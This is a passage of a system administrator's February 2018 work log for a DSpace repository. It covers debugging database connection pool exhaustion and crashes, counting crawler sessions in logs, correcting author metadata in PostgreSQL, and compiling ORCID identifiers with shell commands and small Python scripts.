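        FROM pg_stat_activity
        GROUP BY application_name, state
        ORDER BY count(*) DESC
        """
    )
    for application_name, state, count in cursor.fetchall():
        print(f"{count:5d}  {application_name or '(none)':30s}  {state or '(none)'}")
conn.close()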
  • Since I was restarting Tomcat anyways, I decided to deploy the changes to create two different pools for web and API apps
  • Looking at the Munin graphs, I can see that there were almost double the normal number of DSpace sessions at the time of the crash (and also yesterday!):

DSpace Sessions

  • Indeed it seems like there were over 1800 sessions today around the hours of 10 and 11 AM:

$ grep -E '^2018-02-07 (10|11)' dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+1828
+
  • CGSpace went down again a few hours later, and now the connections to the dspaceWeb pool are maxed at 250 (the new limit I imposed with the new separate pool scheme)
  • What’s interesting is that the DSpace log says the connections are all busy:

org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-328] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:250; idle:0; lastwait:5000].
+
  • … but in PostgreSQL I see them idle or idle in transaction:

$ psql -c 'select * from pg_stat_activity' | grep -c dspaceWeb
+250
+$ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c idle
+250
+$ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c "idle in transaction"
+187
+
  • What the fuck, does DSpace think all connections are busy?
  • I suspect these are issues with abandoned connections or maybe a leak, so I’m going to try adding the removeAbandoned='true' parameter, which is apparently off by default
  • I will try testOnReturn='true' too, just to add more validation, because I’m fucking grasping at straws
  • Also, WTF, there was a heap space error randomly in catalina.out:

Wed Feb 07 15:01:54 UTC 2018 | Query:containerItem:91917 AND type:2
+Exception in thread "http-bio-127.0.0.1-8081-exec-58" java.lang.OutOfMemoryError: Java heap space
+
  • I’m trying to find a way to determine what was using all those Tomcat sessions, but parsing the DSpace log is hard because some IPs are IPv6, which contain colons! (see the Python sketch after the session counts below for one way around that)
  • Looking at the first crash this morning around 11, I see these IPv4 addresses making requests around 10 and 11 AM:

$ grep -E '^2018-02-07 (10|11)' dspace.log.2018-02-07 | grep -o -E 'ip_addr=[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | sort -n | uniq -c | sort -n | tail -n 20
+     34 ip_addr=46.229.168.67
+     34 ip_addr=46.229.168.73
+     37 ip_addr=46.229.168.76
+     40 ip_addr=34.232.65.41
+     41 ip_addr=46.229.168.71
+     44 ip_addr=197.210.168.174
+     55 ip_addr=181.137.2.214
+     55 ip_addr=213.55.99.121
+     58 ip_addr=46.229.168.65
+     64 ip_addr=66.249.66.91
+     67 ip_addr=66.249.66.90
+     71 ip_addr=207.46.13.54
+     78 ip_addr=130.82.1.40
+    104 ip_addr=40.77.167.36
+    151 ip_addr=68.180.228.157
+    174 ip_addr=207.46.13.135
+    194 ip_addr=54.83.138.123
+    198 ip_addr=40.77.167.62
+    210 ip_addr=207.46.13.71
+    214 ip_addr=104.196.152.243
+
    +
  • These IPs made thousands of sessions today:
  • +
+
$ grep 104.196.152.243 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+530
+$ grep 207.46.13.71 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+859
+$ grep 40.77.167.62 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+610
+$ grep 54.83.138.123 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+8
+$ grep 207.46.13.135 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+826
+$ grep 68.180.228.157 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+727
+$ grep 40.77.167.36 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+181
+$ grep 130.82.1.40 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+24
+$ grep 207.46.13.54 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+166
+$ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+992
+
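
As mentioned above, splitting these log lines on “:” breaks for IPv6 addresses, so here is a rough Python sketch that counts unique session IDs per client IP using a regex on the ip_addr= field instead. It is a heuristic: an IPv6 group made up entirely of hex letters could still trip it up.

#!/usr/bin/env python3
# Count unique DSpace session IDs per client IP in a dspace.log file.
# IPv6 addresses contain colons, so instead of splitting the line on ':'
# we match the ip_addr= field up to the next lowercase action token.
import re
import sys
from collections import defaultdict

line_re = re.compile(r"session_id=([A-Z0-9]{32}).*?ip_addr=(.+?):[a-z_]+[:=]")

sessions = defaultdict(set)
with open(sys.argv[1], encoding="utf-8", errors="replace") as log:
    for line in log:
        m = line_re.search(line)
        if m:
            session_id, ip = m.groups()
            sessions[ip].add(session_id)

for ip, ids in sorted(sessions.items(), key=lambda kv: len(kv[1]), reverse=True)[:20]:
    print(f"{len(ids):6d} {ip}")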
  • Let’s investigate who these IPs belong to:
    • 104.196.152.243 is CIAT, which is already marked as a bot via nginx!
    • 207.46.13.71 is Bing, which is already marked as a bot in Tomcat’s Crawler Session Manager Valve!
    • 40.77.167.62 is Bing, which is already marked as a bot in Tomcat’s Crawler Session Manager Valve!
    • 207.46.13.135 is Bing, which is already marked as a bot in Tomcat’s Crawler Session Manager Valve!
    • 68.180.228.157 is Yahoo, which is already marked as a bot in Tomcat’s Crawler Session Manager Valve!
    • 40.77.167.36 is Bing, which is already marked as a bot in Tomcat’s Crawler Session Manager Valve!
    • 207.46.13.54 is Bing, which is already marked as a bot in Tomcat’s Crawler Session Manager Valve!
    • 46.229.168.x is Semrush, which is already marked as a bot in Tomcat’s Crawler Session Manager Valve!
  • Nice, so these are all known bots that are already crammed into one session by Tomcat’s Crawler Session Manager Valve.
  • What in the actual fuck, why is our load doing this? It’s gotta be something fucked up with the database pool being “busy” but everything is fucking idle
  • One that I should probably add in nginx is 54.83.138.123, which is apparently the following user agent:

BUbiNG (+http://law.di.unimi.it/BUbiNG.html)
+
  • This one has been making about two thousand requests per day recently:

# grep -c BUbiNG /var/log/nginx/access.log /var/log/nginx/access.log.1
+/var/log/nginx/access.log:1925
+/var/log/nginx/access.log.1:2029
+
  • And they have 30 IPs, so fuck that shit I’m going to add them to the Tomcat Crawler Session Manager Valve nowwww
  • Lots of discussions on the dspace-tech mailing list over the last few years about leaky transactions being a known problem with DSpace
  • Helix84 recommends restarting PostgreSQL instead of Tomcat because it restarts quicker
  • This is how the connections looked when it crashed this afternoon:

$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
+      5 dspaceApi
+    290 dspaceWeb
+
  • This is how it is right now:

$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
+      5 dspaceApi
+      5 dspaceWeb
+
  • So is this just some fucked up XMLUI database leaking?
  • I notice there is an issue (that I’ve probably noticed before) on the Jira tracker about this that was fixed in DSpace 5.7: https://jira.duraspace.org/browse/DS-3551
  • I seriously doubt this leaking shit is fixed for sure, but I’m gonna cherry-pick all those commits and try them on DSpace Test and probably even CGSpace because I’m fed up with this shit
  • I cherry-picked all the commits for DS-3551 but it won’t build on our current DSpace 5.5!
  • I sent a message to the dspace-tech mailing list asking why DSpace thinks these connections are busy when PostgreSQL says they are idle

2018-02-10

  • I tried to disable ORCID lookups but keep the existing authorities
  • This item has an ORCID for Ralf Kiese: http://localhost:8080/handle/10568/89897
  • Switch authority.controlled off and change authorLookup to lookup, and the ORCID badge doesn’t show up on the item
  • If I leave all settings but change choices.presentation to lookup, the ORCID badge is there, but item submission uses the LC Name Authority and it breaks with this error:

Field dc_contributor_author has choice presentation of type "select", it may NOT be authority-controlled.
+
  • If I change choices.presentation to suggest it gives this error:

xmlui.mirage2.forms.instancedCompositeFields.noSuggestionError
+
  • So I don’t think we can disable the ORCID lookup function and keep the ORCID badges

2018-02-11

  • Magdalena from CCAFS emailed to ask why one of their items has such a weird thumbnail: 10568/90735

Weird thumbnail

  • I downloaded the PDF and manually generated a thumbnail with ImageMagick and it looked better:

$ convert CCAFS_WP_223.pdf\[0\] -profile /usr/local/share/ghostscript/9.22/iccprofiles/default_cmyk.icc -thumbnail 600x600 -flatten -profile /usr/local/share/ghostscript/9.22/iccprofiles/default_rgb.icc CCAFS_WP_223.jpg
+

Manual thumbnail

  • Peter sent me corrected author names last week but the file encoding is messed up:

$ isutf8 authors-2018-02-05.csv
+authors-2018-02-05.csv: line 100, char 18, byte 4179: After a first byte between E1 and EC, expecting the 2nd byte between 80 and BF.
+
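
To see all of the offending rows at once, a small pure-Python check (a sketch; it also prints each bad line decoded as Windows-1252, which is just a guess based on the earlier WLE file):

#!/usr/bin/env python3
# List every line in a file that is not valid UTF-8, with its line number,
# so the bad rows can be fixed (or the file re-exported) before importing.
import sys

with open(sys.argv[1], "rb") as f:
    for number, raw in enumerate(f, start=1):
        try:
            raw.decode("utf-8")
        except UnicodeDecodeError as err:
            print(f"line {number}: {err}")
            # guess at the real encoding for a readable preview
            print(f"  as windows-1252: {raw.decode('windows-1252', errors='replace').strip()}")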
  • The isutf8 program comes from moreutils
  • Line 100 contains: Galiè, Alessandra
  • In other news, the psycopg2 project is splitting its package on pip, so to install the binary wheel distribution you need to use pip install psycopg2-binary
  • See: http://initd.org/psycopg/articles/2018/02/08/psycopg-274-released/
  • I updated my fix-metadata-values.py and delete-metadata-values.py scripts on the scripts page: https://github.com/ilri/DSpace/wiki/Scripts
  • I ran the 342 author corrections (after trimming whitespace and excluding those with || and other syntax errors) on CGSpace:

$ ./fix-metadata-values.py -i Correct-342-Authors-2018-02-11.csv -f dc.contributor.author -t correct -m 3 -d dspace -u dspace -p 'fuuu'
+
  • Then I ran a full Discovery re-indexing:

$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+

  • I also consolidated the “Duncan, Alan” author entries to use a single text value and authority in PostgreSQL:

dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Duncan, Alan%';
+   text_value    |              authority               | confidence 
+-----------------+--------------------------------------+------------
+ Duncan, Alan J. | 5ff35043-942e-4d0a-b377-4daed6e3c1a3 |        600
+ Duncan, Alan J. | 62298c84-4d9d-4b83-a932-4a9dd4046db7 |         -1
+ Duncan, Alan J. |                                      |         -1
+ Duncan, Alan    | a6486522-b08a-4f7a-84f9-3a73ce56034d |        600
+ Duncan, Alan J. | cd0e03bf-92c3-475f-9589-60c5b042ea60 |         -1
+ Duncan, Alan J. | a6486522-b08a-4f7a-84f9-3a73ce56034d |         -1
+ Duncan, Alan J. | 5ff35043-942e-4d0a-b377-4daed6e3c1a3 |         -1
+ Duncan, Alan J. | a6486522-b08a-4f7a-84f9-3a73ce56034d |        600
+(8 rows)
+
+dspace=# begin;
+dspace=# update metadatavalue set text_value='Duncan, Alan', authority='a6486522-b08a-4f7a-84f9-3a73ce56034d', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Duncan, Alan%';
+UPDATE 216
+dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Duncan, Alan%';
+  text_value  |              authority               | confidence 
+--------------+--------------------------------------+------------
+ Duncan, Alan | a6486522-b08a-4f7a-84f9-3a73ce56034d |        600
+(1 row)
+dspace=# commit;
+
  • Run all system updates on DSpace Test (linode02) and reboot it
  • I wrote a Python script (resolve-orcids-from-solr.py) using SolrClient to parse the Solr authority cache for ORCID IDs
  • We currently have 1562 authority records with ORCID IDs, and 624 unique IDs
  • We can use this to build a controlled vocabulary of ORCID IDs for new item submissions
  • I don’t know how to add ORCID IDs to existing items yet… some more querying of PostgreSQL for authority values perhaps?
  • I added the script to the ILRI DSpace wiki on GitHub

2018-02-12

  • Follow up with Atmire on the DSpace 5.8 Compatibility ticket to ask again if they want me to send them a DSpace 5.8 branch to work on
  • Abenet asked if there was a way to get the number of submissions she and Bizuwork did
  • I said that the Atmire Workflow Statistics module was supposed to be able to do that
  • We had tried it in June, 2017 and found that it didn’t work
  • Atmire sent us some fixes but they didn’t work either
  • I just tried the branch with the fixes again and it indeed does not work:

Atmire Workflow Statistics No Data Available

  • I see that in April, 2017 I just used a SQL query to get a user’s submissions by checking the dc.description.provenance field
  • So for Abenet, I can check her submissions in December, 2017 with:

dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^Submitted.*yabowork.*2017-12.*';
+
  • I emailed Peter to ask whether we can move DSpace Test to a new Linode server and attach 300 GB of disk space to it
  • This would be using Linode’s new block storage volumes
  • I think our current $40/month Linode has enough CPU and memory capacity, but we need more disk space
  • I think I’d probably just attach the block storage volume and mount it on /home/dspace
  • Ask Peter about dc.rights on DSpace Test again; if he likes it then we should move it to CGSpace soon

2018-02-13

  • Peter said he was getting a “socket closed” error on CGSpace
  • I looked in dspace.log.2018-02-13 and saw one recent one:

2018-02-13 12:50:13,656 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error - 
+org.postgresql.util.PSQLException: An I/O error occurred while sending to the backend.
+...
+Caused by: java.net.SocketException: Socket closed
+
    +
  • Could be because of the removeAbandoned="true" that I enabled in the JDBC connection pool last week?
  • +
+
$ grep -c "java.net.SocketException: Socket closed" dspace.log.2018-02-*
+dspace.log.2018-02-01:0
+dspace.log.2018-02-02:0
+dspace.log.2018-02-03:0
+dspace.log.2018-02-04:0
+dspace.log.2018-02-05:0
+dspace.log.2018-02-06:0
+dspace.log.2018-02-07:0
+dspace.log.2018-02-08:1
+dspace.log.2018-02-09:6
+dspace.log.2018-02-10:0
+dspace.log.2018-02-11:3
+dspace.log.2018-02-12:0
+dspace.log.2018-02-13:4
+
    +
  • I apparently added that on 2018-02-07 so that could well be it, as I don’t see any of those socket closed errors in 2018-01’s logs!
  • +
  • I will increase the removeAbandonedTimeout from its default of 60 to 90 and enable logAbandoned
  • +
  • Peter hit this issue one more time, and this is apparently what Tomcat’s catalina.out log says when an abandoned connection is removed:
  • +
+
Feb 13, 2018 2:05:42 PM org.apache.tomcat.jdbc.pool.ConnectionPool abandon
+WARNING: Connection has been abandoned PooledConnection[org.postgresql.jdbc.PgConnection@22e107be]:java.lang.Exception
+

2018-02-14

+
    +
  • Skype with Peter and the Addis team to discuss what we need to do for the ORCIDs in the immediate future
  • +
  • We said we’d start with a controlled vocabulary for cg.creator.id on the DSpace Test submission form, where we store the author name and the ORCID in some format like: Alan S. Orth (0000-0002-1735-7458)
  • +
  • Eventually we need to find a way to print the author names with links to their ORCID profiles
  • +
  • Abenet will send an email to the partners to give us ORCID IDs for their authors and to stress that they update their name format on ORCID.org if they want it in a special way
  • +
  • I sent the Codeobia guys a question to ask how they prefer that we store the IDs, ie one of: +
      +
    • Alan Orth - 0000-0002-1735-7458
    • +
    • Alan Orth: 0000-0002-1735-7458
    • +
    • Alan S. Orth (0000-0002-1735-7458)
    • +
    +
  • +
  • Atmire responded on the DSpace 5.8 compatibility ticket and said they will let me know if they want me to give them a clean 5.8 branch
  • +
  • I formatted my list of ORCID IDs as a controlled vocabulary, sorted alphabetically, then ran through XML tidy:
  • +
+
$ sort cgspace-orcids.txt > dspace/config/controlled-vocabularies/cg-creator-id.xml
+$ add XML formatting...
+$ tidy -xml -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
+
    +
  • It seems that tidy fucks up accents, for example it turns Adriana Tofiño (0000-0001-7115-7169) into Adriana TofiÃ±o (0000-0001-7115-7169)
  • +
  • We need to force UTF-8:
  • +
+
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
+
    +
  • This preserves special accent characters
  • +
  • I tested the display and store of these in the XMLUI and PostgreSQL and it looks good
  • +
  • Sisay exported all ILRI, CIAT, etc authors from ORCID and sent a list of 600+
  • +
  • Peter combined it with mine and we have 1204 unique ORCIDs!
  • +
+
$ grep -coE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' CGcenter_ORCID_ID_combined.csv
+1204
+$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' CGcenter_ORCID_ID_combined.csv | sort | uniq | wc -l
+1204
+
    +
  • Also, save that regex for the future because it will be very useful!
  • +
  • CIAT sent a list of their authors’ ORCIDs and combined with ours there are now 1227:
  • +
+
$ cat CGcenter_ORCID_ID_combined.csv ciat-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
+1227
+
    +
  • There are some formatting issues with names in Peter’s list, so I should remember to re-generate the list of names from ORCID’s API once we’re done
  • +
  • The dspace cleanup -v currently fails on CGSpace with the following:
  • +
+
 - Deleting bitstream record from database (ID: 149473)
+Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
+  Detail: Key (bitstream_id)=(149473) is still referenced from table "bundle".
+
    +
  • The solution is to update the bitstream table, as I’ve discovered several other times in 2016 and 2017:
  • +
+
$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (149473);'
+UPDATE 1
+
    +
  • Then the cleanup process will continue for a while and hit another foreign key conflict, and eventually it will complete after you manually resolve them all
  • +
+

2018-02-15

+
    +
  • Altmetric seems to be indexing DSpace Test for some reason: + +
  • +
  • And this item doesn’t even exist on CGSpace!
  • +
  • Start working on XMLUI item display code for ORCIDs
  • +
  • Send emails to Macaroni Bros and Usman at CIFOR about ORCID metadata
  • +
  • CGSpace crashed while I was driving to Tel Aviv, and was down for four hours!
  • +
  • I only looked quickly in the logs but saw a bunch of database errors
  • +
  • PostgreSQL connections are currently:
  • +
+
$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | uniq -c
+      2 dspaceApi
+      1 dspaceWeb
+      3 dspaceApi
+
    +
  • I see shitloads of memory errors in Tomcat’s logs:
  • +
+
# grep -c "Java heap space" /var/log/tomcat7/catalina.out
+56
+
    +
  • And shit tons of database connections abandoned:
  • +
+
# grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' /var/log/tomcat7/catalina.out
+612
+
    +
  • I have no fucking idea why it crashed
  • +
  • The XMLUI activity looks like:
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E "15/Feb/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    715 63.143.42.244
+    746 213.55.99.121
+    886 68.180.228.157
+    967 66.249.66.90
+   1013 216.244.66.245
+   1177 197.210.168.174
+   1419 207.46.13.159
+   1512 207.46.13.59
+   1554 207.46.13.157
+   2018 104.196.152.243
+

2018-02-17

+
    +
  • Peter pointed out that we had an incorrect sponsor in the controlled vocabulary: U.S. Agency for International Development → United States Agency for International Development
  • +
  • I made a pull request to fix it (#354: https://github.com/ilri/DSpace/pull/354)
  • +
  • I should remember to update existing values in PostgreSQL too:
  • +
+
dspace=# update metadatavalue set text_value='United States Agency for International Development' where resource_type_id=2 and metadata_field_id=29 and text_value like '%U.S. Agency for International Development%';
+UPDATE 2
+
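  • In the future it would be smarter to check how many rows would be affected before running such an update, for example:
dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=29 and text_value like '%U.S. Agency for International Development%';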

2018-02-18

+
    +
  • ICARDA’s Mohamed Salem pointed out that it would be easiest to format the cg.creator.id field like “Alan Orth: 0000-0002-1735-7458” because no name will have a “:” so it’s easier to split on
  • +
  • I finally figured out a few ways to extract ORCID iDs from metadata using XSLT and display them in the XMLUI:
  • +
+

Displaying ORCID iDs in XMLUI

+
    +
  • The one on the bottom left uses a similar format to our author display, and the one in the middle uses the format recommended by ORCID’s branding guidelines
  • +
  • Also, I realized that the Academicons font icon set we’re using includes an ORCID badge so we don’t need to use the PNG image anymore
  • +
  • Run system updates on DSpace Test (linode02) and reboot the server
  • +
  • Looking back at the system errors on 2018-02-15, I wonder what the fuck caused this:
  • +
+
$ wc -l dspace.log.2018-02-1{0..8}
+   383483 dspace.log.2018-02-10
+   275022 dspace.log.2018-02-11
+   249557 dspace.log.2018-02-12
+   280142 dspace.log.2018-02-13
+   615119 dspace.log.2018-02-14
+  4388259 dspace.log.2018-02-15
+   243496 dspace.log.2018-02-16
+   209186 dspace.log.2018-02-17
+   167432 dspace.log.2018-02-18
+
    +
  • From an average of a few hundred thousand to over four million lines in DSpace log?
  • +
  • Using grep’s -B1 I can see the line before the heap space error, which has the time, ie:
  • +
+
2018-02-15 16:02:12,748 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
+org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.OutOfMemoryError: Java heap space
+
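  • For reference, the grep invocation is something like:
$ grep -B1 'nested exception is java.lang.OutOfMemoryError: Java heap space' dspace.log.2018-02-15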
    +
  • So these errors happened at hours 16, 18, 19, and 20
  • +
  • Let’s see what was going on in nginx then:
  • +
+
# zcat --force /var/log/nginx/*.log.{3,4}.gz | wc -l
+168571
+# zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E "15/Feb/2018:(16|18|19|20)" | wc -l
+8188
+
    +
  • Only 8,000 requests during those four hours, out of 170,000 the whole day!
  • +
  • And the usage of XMLUI, REST, and OAI looks SUPER boring:
  • +
+
# zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E "15/Feb/2018:(16|18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    111 95.108.181.88
+    158 45.5.184.221
+    201 104.196.152.243
+    205 68.180.228.157
+    236 40.77.167.131 
+    253 207.46.13.159
+    293 207.46.13.59
+    296 63.143.42.242
+    303 207.46.13.157
+    416 63.143.42.244
+
    +
  • 63.143.42.244 is Uptime Robot, and 207.46.x.x is Bing!
  • +
  • The DSpace sessions, PostgreSQL connections, and JVM memory all look normal
  • +
  • I see a lot of AccessShareLock on February 15th…?
  • +
+

PostgreSQL locks

+
    +
  • I have no idea what caused this crash
  • +
  • In other news, I adjusted the ORCID badge size on the XMLUI item display and sent it back to Peter for feedback
  • +
+

2018-02-19

+
    +
  • Combined list of CGIAR author ORCID iDs is up to 1,500:
  • +
+
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI-csv.csv CGcenter_ORCID_ID_combined.csv | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l  
+1571
+
    +
  • I updated my resolve-orcids-from-solr.py script to be able to resolve ORCID identifiers from a text file so I renamed it to resolve-orcids.py
  • +
  • Also, I updated it so it uses several new options:
  • +
+
$ ./resolve-orcids.py -i input.txt -o output.txt
+$ cat output.txt 
+Ali Ramadhan: 0000-0001-5019-1368
+Ahmad Maryudi: 0000-0001-5051-7217
+
    +
  • I was running this on the new list of 1571 and found an error:
  • +
+
Looking up the name associated with ORCID iD: 0000-0001-9634-1958
+Traceback (most recent call last):
+  File "./resolve-orcids.py", line 111, in <module>
+    read_identifiers_from_file()
+  File "./resolve-orcids.py", line 37, in read_identifiers_from_file
+    resolve_orcid_identifiers(orcids)
+  File "./resolve-orcids.py", line 65, in resolve_orcid_identifiers
+    family_name = data['name']['family-name']['value']
+TypeError: 'NoneType' object is not subscriptable
+
    +
  • According to ORCID that identifier’s family-name is null so that sucks
  • +
  • I fixed the script so that it checks if the family name is null
  • +
  • Now another:
  • +
+
Looking up the name associated with ORCID iD: 0000-0002-1300-3636
+Traceback (most recent call last):
+  File "./resolve-orcids.py", line 117, in <module>
+    read_identifiers_from_file()
+  File "./resolve-orcids.py", line 37, in read_identifiers_from_file
+    resolve_orcid_identifiers(orcids)
+  File "./resolve-orcids.py", line 65, in resolve_orcid_identifiers
+    if data['name']['given-names']:
+TypeError: 'NoneType' object is not subscriptable
+
    +
  • According to ORCID that identifier’s entire name block is null!
  • +
+

2018-02-20

+
    +
  • Send Abenet an email about getting a purchase requisition for a new DSpace Test server on Linode
  • +
  • Discuss some of the issues with null values and poor-quality names in some ORCID identifiers with Abenet, and I think we’ll now only use ORCID iDs that have been sent to us by partners, not those extracted via keyword searches on orcid.org
  • +
  • This should be the version we use (the existing controlled vocabulary generated from CGSpace’s Solr authority core plus the IDs sent to us so far by partners):
  • +
+
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI.csv | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > 2018-02-20-combined.txt
+
    +
  • I updated the resolve-orcids.py to use the “credit-name” if it exists in a profile, falling back to “given-names” + “family-name”
  • +
  • Also, I added color-coded output to the debug messages and added a “quiet” mode that suppresses the normal behavior of printing results to the screen
  • +
  • I’m using this as the test input for resolve-orcids.py:
  • +
+
$ cat orcid-test-values.txt 
+# valid identifier with 'given-names' and 'family-name'
+0000-0001-5019-1368
+
+# duplicate identifier
+0000-0001-5019-1368 
+
+# invalid identifier
+0000-0001-9634-19580
+
+# has a 'credit-name' value we should prefer
+0000-0002-1735-7458
+
+# has a blank 'credit-name' value
+0000-0001-5199-5528
+
+# has a null 'name' object
+0000-0002-1300-3636
+
+# has a null 'family-name' value
+0000-0001-9634-1958
+
+# missing ORCID identifier
+0000-0003-4221-3214
+
+

2018-02-22

+
    +
  • CGSpace was apparently down today around 13:00 server time and I didn’t get any emails on my phone, but saw them later on the computer
  • +
  • It looks like Sisay restarted Tomcat because I was offline
  • +
  • There was absolutely nothing interesting going on at 13:00 on the server, WTF?
  • +
+
# cat /var/log/nginx/*.log | grep -E "22/Feb/2018:13" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+     55 192.99.39.235
+     60 207.46.13.26
+     62 40.77.167.38
+     65 207.46.13.23
+    103 41.57.108.208
+    120 104.196.152.243
+    133 104.154.216.0
+    145 68.180.228.117
+    159 54.92.197.82
+    231 5.9.6.51
+
    +
  • Otherwise there was pretty normal traffic the rest of the day:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "22/Feb/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    839 216.244.66.245
+   1074 68.180.228.117
+   1114 157.55.39.100
+   1162 207.46.13.26
+   1178 207.46.13.23
+   2749 104.196.152.243
+   3109 50.116.102.77
+   4199 70.32.83.92
+   5208 5.9.6.51
+   8686 45.5.184.196
+
    +
  • So I don’t see any definite cause for this crash, but I do see a shit ton of abandoned PostgreSQL connections today around 1PM!
  • +
+
# grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' /var/log/tomcat7/catalina.out
+729
+# grep 'Feb 22, 2018 1' /var/log/tomcat7/catalina.out | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' 
+519
+
    +
  • I think the removeAbandonedTimeout might still be too low (I increased it from 60 to 90 seconds last week)
  • +
  • Abandoned connections are not a cause but a symptom, though perhaps a timeout of a few minutes would be better than 90 seconds?
  • +
  • Also, while looking at the logs I see some new bot:
  • +
+
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.4.2661.102 Safari/537.36; 360Spider
+
    +
  • It seems to re-use its user agent but makes tons of useless requests and I wonder if I should add “.spider.” to the Tomcat Crawler Session Manager valve?
  • +
+
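  • A quick way to check whether the valve already covers it would be to request a page with that user agent and see if a new JSESSIONID cookie comes back in the response headers:
$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.4.2661.102 Safari/537.36; 360Spider'
  • If there is no Set-Cookie in the response then the Crawler Session Manager valve is already handling it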

2018-02-23

+
    +
  • Atmire got back to us with a quote about their DSpace 5.8 upgrade
  • +
+

2018-02-25

+
    +
  • A few days ago Abenet sent me the list of ORCID iDs from CCAFS
  • +
  • We currently have 988 unique identifiers:
  • +
+
$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l          
+988
+
    +
  • After adding the ones from CCAFS we now have 1004:
  • +
+
$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ccafs | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
+1004
+
    +
  • I will add them to DSpace Test but Abenet says she’s still waiting to send us ILRI’s list
  • +
  • I will tell her that we should proceed with sharing our work on DSpace Test with the partners this week anyway, and we can update the list later
  • +
  • While regenerating the names for these ORCID identifiers I saw one that has a weird value for its names:
  • +
+
Looking up the names associated with ORCID iD: 0000-0002-2614-426X
+Given Names Deactivated Family Name Deactivated: 0000-0002-2614-426X
+
    +
